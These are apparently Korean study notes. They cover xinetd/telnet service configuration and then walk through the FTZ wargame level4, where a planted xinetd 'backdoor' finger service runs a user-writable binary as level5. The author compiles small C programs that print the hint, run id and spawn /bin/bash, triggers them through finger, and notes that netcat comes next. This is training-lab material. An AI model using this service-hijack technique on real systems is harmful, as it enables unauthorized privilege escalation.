# description: The kerberized telnet server accepts normal telnet sessions, \
#              but can also use Kerberos 5 authentication.
service telnet
{
        disable = no
        flags           = REUSE
        socket_type     = stream       
        wait            = no
        user            = root
        server          = /usr/kerberos/sbin/telnetd
        log_on_failure  += USERID
}


# vi krb5-telnet

[수정전]
disable = no 
[수정후]
disable = yes


# service xinetd restart
# telnet localhost
-> 접근 X

# vi krb5-telnet

[수정전]
disable = yes
[수정후]
disable = no


# service xinetd restart
# telnet localhost
-> 접근 0 (적당한 사용자로 로그인)
# exit


# chkconfig krb5-telnet off
# cat /etc/xinetd.d/krb5-telnet
-> disable = yes

# chkconfig krb5-telnet on
# cat /etc/xinetd.d/krb5-telnet
-> disable = no

    (standalone 방식의 서비스)
        (부팅) # chkconfig httpd on
        (현재) # service httpd restart
    (xinetd 방식의 서비스)
          # chkconfig krb5-telnet on --> /etc/xinetd.conf(/etc/xinetd.d/krb5-telnet)
        # service xinetd restart



[실습] xinetd/standalone 방식의 서비스 목록 확인
# chkconfig --list
-> 출력 내용 생략

# chkconfig --list | grep httpd

httpd           0:off   1:off   2:on    3:on    4:on    5:on    6:off

    # chkconfig httpd on
    # service httpd restart

# chkconfig --list | grep telnet

        ekrb5-telnet:   off
        krb5-telnet:    on

    # chkconfig krb5-telnet on
    # service xinetd restart







[level4@ftz level4]$ cd /etc/xinetd.d
[level4@ftz xinetd.d]$ ls -al

합계 112
drwxr-xr-x    2 root     root         4096  8월 19 12:58 .
drwxr-xr-x   64 root     root         4096  8월 21 17:13 ..
-r--r--r--    1 root     level4        171  8월 19 12:58 backdoor
-rw-r--r--    1 root     root          563  2월 25  2003 chargen
-rw-r--r--    1 root     root          580  2월 25  2003 chargen-udp
-rwxr-xr-x    1 root     root          239  2월 13  2003 cups-lpd
-rw-r--r--    1 root     root          419  2월 25  2003 daytime
-rw-r--r--    1 root     root          438  2월 25  2003 daytime-udp
-rw-r--r--    1 root     root          341  2월 25  2003 echo
-rw-r--r--    1 root     root          360  2월 25  2003 echo-udp
-rw-r--r--    1 root     root          318  1월 25  2003 finger
-rw-r--r--    1 root     root          370  1월 25  2003 imap
-rw-r--r--    1 root     root          365  1월 25  2003 imaps
-rw-r--r--    1 root     root          453  1월 25  2003 ipop2
-rw-r--r--    1 root     root          359  1월 25  2003 ipop3
-rw-r--r--    1 root     root          275  2월  5  2003 ntalk
-rw-r--r--    1 root     root          335  1월 25  2003 pop3s
-rw-r--r--    1 root     root          361  1월 25  2003 rexec
-rw-r--r--    1 root     root          378  1월 25  2003 rlogin
-rw-r--r--    1 root     root          431  1월 25  2003 rsh
-rw-r--r--    1 root     root          317  1월 25  2003 rsync
-rw-r--r--    1 root     root          312  2월 25  2003 servers
-rw-r--r--    1 root     root          314  2월 25  2003 services
-rw-r--r--    1 root     root          392  2월  1  2003 sgi_fam
-rw-r--r--    1 root     root          263  2월  5  2003 talk
-rw-r--r--    1 root     root          305  8월 19 12:58 telnet
-rw-r--r--    1 root     root          497  2월 25  2003 time
-rw-r--r--    1 root     root          518  2월 25  2003 time-udp

    [참고]
    $ export LANG=C
    $ /sbin/chkconfig --list | sed -n '/xinetd based/,$p' | grep -w on
[level4@ftz xinetd.d]$ cat /etc/xinetd.d/backdoor

service finger
{
        disable = no
        flags           = REUSE 
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}


● service finger반드시 /etc/services 파일에 들어 있는 이름이어야 한다.(반드시 서비스 이름과 포트가 매핑되어

야 한다.)# cat /etc/services | grep finger finger          79/tcpfinger          79/udp
● disable = no 데몬을 비활성화하지 않음, disable = yes로 설정되면 해당 서비스를 기동하지 않음서비스의 이름

으로는 /etc/services 파일에 있는 서비스명으로 선택하는 것을 권장.
● flags = REUSE서비스 포트가 사용 중인 경우 해당 포트의 재사용을 허가
● socket_type = streamTCP(stream)/UDP(dgram) 프로토콜을 선택
● wait = no이미 서비스가 연결된 상태에서 다른 요청이 오면 바로 응답함, 다르게 표현하면 telnetd은 동시에 다

수의 접속이 가능하다는 의미.
● user = root해당 데몬이 root 계정의 권한으로 실행됨
● server = /usr/bin/in.fingerdxinetd에 의해 실행될 데몬 파일
● log_on_failure += USERID정상적인 기동에 실패한 경우 USERID를 로그에 기록





[level4@ftz xinetd.d]$ cat /etc/services | grep finger

finger          79/tcp
finger          79/udp
cfinger         2003/tcp                        # GNU Finger


[level4@ftz xinetd.d]$ netstat -an | grep :79

tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN


[level4@ftz xinetd.d]$ ls -l /home/level4/tmp/backdoor

ls: /home/level4/tmp/backdoor: 그런 파일이나 디렉토리가 없음


    # man finger
          NAME
               finger - user information lookup program

          SYNOPSIS
               finger [-lmsp] [user ...] [user@host ...]

[level4@ftz xinetd.d]$ finger level4@localhost
[level4@ftz xinetd.d]$
-> 정상적으로 실행되지 않는다.







----------------------------------------------------------------------------------------------
/etc/xinetd.d/backdoor 파일

service finger
{
        disable = no
        flags           = REUSE 
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}


● ( ? ) /home/level4/tmp/backdoor -> /usr/sbin/in.telnetd 설정을 바꾸고 원격에서 접속한다면
● ( ? ) 그럼 우리가 원하는 프로그램이 실행 될수 있도록 한다면
----------------------------------------------------------------------------------------------


공격용 파일을 생성한다.

[level4@ftz xinetd.d]$ cd ~/tmp    ($ vi /home/level4/tmp/backdoor)
[level4@ftz tmp]$ vi backdoor.c

#include<stdlib.h>

int main()
{
    system("cat /home/level4/hint");
    system("id");
}


[level4@ftz tmp]$ gcc -o backdoor backdoor.c
[level4@ftz tmp]$ finger level4@localhost



누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!    /* system("cat /home/level4/hint"); */


uid=3005(level5) gid=3005(level5)                /* system("id"); */


[level4@ftz tmp]$ vi backdoor2.c

#include <stdlib.h>

int main()
{
    system("/bin/bash");
}


[level4@ftz tmp]$ gcc -o backdoor backdoor2.c
[level4@ftz tmp]$ finger level4@localhost

/bin/bash: line 1: level4
: command not found
id
my-pass

<CTRL + C>

-> 정상적으로 명령어가 수행되지 않는다는 것을 알수 있다.
-> 따라서 원격에서 nc(netcat) 명령어를 사용한다.